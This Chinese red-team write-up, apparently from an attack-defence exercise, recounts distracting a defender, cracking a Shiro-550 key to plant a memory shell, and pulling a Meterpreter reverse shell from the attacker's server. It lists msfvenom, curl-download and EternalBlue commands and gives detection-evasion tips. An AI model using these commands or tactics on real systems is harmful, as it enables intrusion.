实战渗透1过程回顾

  • A+
所属分类:安全文章

1.前言

近期HW行动的高潮已经到了中旬,蓝队24x7的防护,阿布面对众多waf跟蓝队的防守也是头疼,蓝队哥哥IP封的速度太快了,信息收集死了6个代理池,发现告警立马封禁,但是俗话说的好,不怕贼偷只怕贼惦记,阿布费尽心思潜入各大甲方群,偷偷观察防守人员的动态信息,终于找到了一名防守的信息,这里不能截图害怕信息泄露,通过聊天得知,晚上只有一个人值守,4个人轮班倒,晚上客户都回去下班睡觉了,小阿布稍微勾引便找了个兄弟协同蓝队兄弟打上了lol,还找了陪玩妹妹!这个妹妹声音那简直就用两个字来形容摄人心魄!


实战渗透1过程回顾

实战渗透1过程回顾

 

老祖宗留下来了三十六计之一美人计,自古成功率最高,多少英雄豪杰死在温柔乡哎。

成功支走了蓝队防守人员,阿布能有什么坏心思,只想拿点shell罢了

 

实战渗透1过程回顾


2.先说一说信息收集的情况

http://www.xxxx.cn/  JSP语言开发 nginx反向代理

http://one.xxxx.cn/ 身份认证平台 JSP语言开发 nginx反向代理

https://xxxx. CRM管理平台 JSP语言开发 nginx反向代理

http://xxxx.com/ 网站后台管理系统 JSP语言开发 nginx反向代理

首先网站都是基于java开发


那么这里总结一下java的漏洞


JDK漏洞 cve-2012-4681,cve-2012-1723,cve-2012-0507,cve-2013-0422
中间件漏洞:Tomcat,JBoss,Jetty,Jenkins
开发框架以及组件漏洞:Struts框架,Spring框架,Play框架,Dubbo。
安全框架:Spring secuinty,Shiro,OWASP ESAPI

3.实操

1.开局直接命中,实际上早就发现这块有东西,但是不敢轻易测试,害怕被态势感知检测出来异常流量,反手修复,所以趁着蓝队打游戏中,速战速决,现在使用Shiro安全框架的还是比较多的,话不多说上图

实战渗透1过程回顾

 

实战渗透1过程回顾


2.在一个登录框发现使用的是shiro安全框架

通过回显确实使用shiro安全框架


Shiro安全框架介绍

Shiro Apache 旗下的一个用于权限管理的开源框架,提供开箱即用的身份验证、授权、密码套件和会话管理等功能。该框架在 2016 年爆出了一个著名的漏洞——Shiro-550,即 RememberMe 反序列化漏洞,利用漏洞手法详细介绍

https://zhuanlan.zhihu.com/p/170393917


 3. 打开检测工具枚举key尝试碰撞出正确的key,基本操作基本操作,想必这时候蓝队已经跟妹妹打嗨的吧,哈哈


 

实战渗透1过程回顾

实战渗透1过程回顾

 

 

4.既然知道正确的key了那我们直接写入内存马,写入成功后访问,写入成功后,验证是否成功


 

实战渗透1过程回顾


实战渗透1过程回顾

 

root权限,往上翻一番,看看有没有子站,ls ../../

这里不放图了保护隐私,反正下属资产还挺多嘿嘿,成功拿到一台通往内网的shell

 

说一下当前情况,ping域名解析的是68段子开头,然后dnslog结果显示58173段子开,这就有点纳闷了,走的反向代理,但是dnslog是公共ip,不像是出口ip,这里我判断是机房dns线路走的公共的,然后curl 访问一下自己的c2服务器,47出口防火墙,这下好了没法,不能正向进去,那就反向msf上线,准备内网扩大战果

实战渗透1过程回顾

 

 

 

5.生成文件

Msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f elf > /var/www/html/HYNB.elf


6.开启web服务:


python -m SimpleHTTPServer 443


7.Curl访问下载web地址,成功上线。 

实战渗透1过程回顾


8.检测永恒之蓝

use auxiliary/scanner/smb/smb_ms17_010Set 配置一下检测的ip段子Run 开始进行检测



9.进行攻击

use exploit/windows/smb/ms17_010_eternalblue (加载攻击模块)set RHOST 公网ip(被攻击机IP)set LHOST 公网ip(设置本地IP)set LPORT 自定义(设置连接端口)set payload windows/x64/meterpreter/reverse_tcp(配置回链方式)show options(查看配置相关信息)run(或者exploit,开始攻击)


被踢

在我操作meterpreter的时候,突然session close,漏洞被修复了……


结尾

本次渗透总结:资产虽然很多硬不好打,但是没有绝对的防御,毕竟攻防就是人与人之间的对抗,如果蓝队直接发现我在撕口子的时候,把我封了然后修复资产,那么可能就没这么顺利了,当然红队和渗透测试的区别就是,红队会针对目标进行战术编写,不光WEB渗透层面,还包括物联网,近源,社工钓鱼等等手法,有一个战术方案。心疼蓝队哥哥值班玩游戏还被抓到了

实战渗透1过程回顾


菜鸡点评


 根据阿布所述,他是从凌晨00点发现漏洞到凌晨5:30被踢,一共是5个半小时,其中下载马儿进去就5点多了。

1. 对于阿布发现目标web都是java开发的时候就马上总结出java的漏洞这一点非常好!这样可以省很多时间,也是非常有效果!简直就是高效!

2. 对于他怀疑可能存在漏洞的目标站点,他选择使用了网上的程序进行exploit,这点对于老手来说是不太明智的,因为网上的程序带有的别人的payload,有可能会被蓝方的检测设备加入到特征内,高明的选手会选择手工或使用自己开发的程序,当然阿布可能觉得目标太low,还不配他掏出宝物。

3. 我很纳闷为啥这么久才上msf,而且为啥是msf,msf的流量很容易被检测到,我推断就是msf的流量被检测到了,然后就封ip,补漏洞。所以下次发现能执行,不要随便上msf,开个反向代理,就开始扫内网了啊,cs配合开出来的带来,本地利用cs的portscan功能扫目标。当然阿布如果认真起来肯定是掏出的darkTools啊。

4. 总的来说阿布这次的手速不够,选择也出现失误。



 


本文始发于微信公众号(5号黯区):实战渗透1过程回顾

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: